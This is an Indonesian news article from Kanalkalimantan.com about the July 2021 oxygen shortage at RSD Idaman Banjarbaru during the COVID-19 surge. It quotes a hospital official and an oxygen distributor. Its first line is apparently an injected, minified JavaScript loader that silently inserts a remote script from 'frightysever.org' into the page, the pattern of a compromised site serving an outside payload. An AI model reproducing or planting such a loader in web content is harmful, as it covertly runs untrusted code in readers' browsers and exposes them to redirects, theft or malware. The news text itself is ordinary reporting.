(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

BREAKING NEWS. Krisis Oksigen, RSD Idaman Juga Tak Terima Pasien Baru yang Perlu Oksigen!


KANALKALIMANTAN.COM, BANJARBARU – Sama seperti sejumlah rumah sakit lain, RSD Idaman Banjarbaru juga mengalami krisis oksigen. Hal ini seiring dengan meningkatnya jumlah pasien Covid-19 yang dirawat di rumah sakit milik Pemko Banjarbaru ini. Bahkan, RSD Idaman sudah tidak dapat menerima pasien baru yang memerlukan oksigen.

Melalui pengumuman resmi, RSD Idaman menyampaikan bahwa ketersediaan oksigen saat ini menipis.

Maka RSD Idaman Banjarbaru tidak dapat menerima pasien baru yang memerlukan oksigen, serta pasien lain yang tidak memerlukan oksigen dapat dilayani sesuai kapasitas ruangan.

Saat dimintai konfirmasi mengenai stok oksigen di RSD Idaman, Kepala Bagian Tata Usaha Muhammad Firmansyah, menyampaikan dirinya sedang fokus pada masalah oksigen.

 

 

Baca juga: GENTING. Stok Oksigen Kalsel Menipis, RS Ratu Zalecha Tak Terima Pasien Baru Rawat Inap

“Nanti saja, saya sedang fokus ke rumah sakit dulu, nanti saya buat press releasenya saja,” terangnya kepada Kanalkalimantan.com pada Minggu (25/7/2021) sore.

Sebelumnya,  RS Ratu Zalecha Martapura yang menyatakan untuk sementara tidak menerima pasien baru rawat inap yang memerlukan oksigen karena keterbatasan stok.

Pantauan Kanalkalimantan.com di sejumlah lokasi, Minggu (25/7/2021), menyatakan stok oksigen bahkan sudah kosong mulai kemarin.  M Afri Yandi alias Edak, seorang distributor oksigen dari PT Samator mengatakan kelangkaan oksigen di Banjarbaru.

“Masih kosong dan nggak tahu kapan datangnya lagi,” ujarnya kepada Kanalkalimantan.com saat dihubungi sore tadi.

Baca juga: Kalsel Kondisi Genting, Dewan ‘Sorot’ Langkah Pemprov Tangani Covid-19 

“Jangankan di tempat penjualan kayak kami, di pabrik saja sudah banyak tabung yang kosong,” ucap Edak.

“Tabungnya ya segitu aja jumlahnya, liquid-nya terbatas. Tabungnya nggak nambah lagi di pabrik, soalnya udah nggak ngejualin lagi,” tambahnya.

Edak menerangkan, bahwa untuk membeli oksigen langsung dari pabrik sekarang tidak semudah dulu. “Datang ke PT Samator harus bawa surat keterangan dokter, bukti kalo benar-benar butuh oksigen. Saat pengambilan juga harus dikawal oleh pihak rumah sakit,” katanya.  (kanalkalimantan.com/dewi)

Reporter : dewi
Editor : cell


Al Ghifari

Recent Posts

Jalinan Erat Silaturahmi Warga Sungai Besar dari Budaya Banjar “Balogo”

KANALKALIMANTAN.COM, BANJARBARU – Suasana riuh diiringi tawa gembira warga baik tua, muda, hingga anak-anak, larut… Read More

7 jam ago

Pelantikan Pengurus Wilayah Keluarga Besar PII Kalsel

KANALKALIMANTAN.COM, BANJARMASIN – 4 Mei diperingati Hari Bangkit (Harba) organisasi pelajar tertua di Tanah Air,… Read More

9 jam ago

Lesti Kejora Hingga Ria Ricis Siap Ramaikan Silet Awards 2024!

KANALKALIMANTAN.COM, - Ajang penghargaan paling dramatis dan paling sensasional yang ditunggu masyarakat, Silet Awards 2024… Read More

9 jam ago

Kontes Motor 2Tak “Entwosiastrokes Volume 2 2024” di Banjarbaru, Ajang Adu Para Modifikator Banua

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin mengapreasiasi penyelenggaraan event kontes motor "Entwosiastrokes… Read More

10 jam ago

Kali Pertama Airbus A340 Layani Jemaah Haji Embarkasi Banjarmasin

Penerbangan Kloter 1 Sempat Terlambat 30 Menit Read More

14 jam ago

100 Peserta Ramaikan Kejuaraan Catur se Kalteng Piala Pj Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Kejuaraan catur piala Pj Bupati Kapuas se Kalimantan Tengah dibuka oleh… Read More

17 jam ago

This website uses cookies.